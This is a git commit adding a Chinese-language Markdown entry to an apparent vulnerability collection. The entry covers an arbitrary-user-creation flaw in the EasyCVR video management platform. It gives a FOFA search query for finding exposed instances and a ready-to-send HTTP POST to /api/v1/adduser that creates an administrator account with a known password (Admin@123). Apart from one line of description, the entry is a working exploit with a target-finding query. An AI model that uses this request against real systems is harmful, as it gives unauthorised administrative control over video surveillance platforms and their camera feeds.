24-5-21更新漏洞
This commit is contained in:
28
EasyCVR视频管理平台存在任意用户添加漏洞.md
Normal file
28
EasyCVR视频管理平台存在任意用户添加漏洞.md
Normal file
@@ -0,0 +1,28 @@
|
||||
## EasyCVR视频管理平台存在任意用户添加漏洞
|
||||
|
||||
EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务,攻击者可通过`/api/v1/adduser`接口添加管理员账户
|
||||
|
||||
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
app="EasyCVR-视频管理平台"
|
||||
```
|
||||
|
||||
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
POST /api/v1/adduser HTTP/1.1
|
||||
Host: your-ip
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
|
||||
```
|
||||
|
||||
`0e7517141fb53f21ee439b355b5a1d0a` 明文为 `Admin@123`
|
||||
|
||||

|
||||
|
||||
Reference in New Issue
Block a user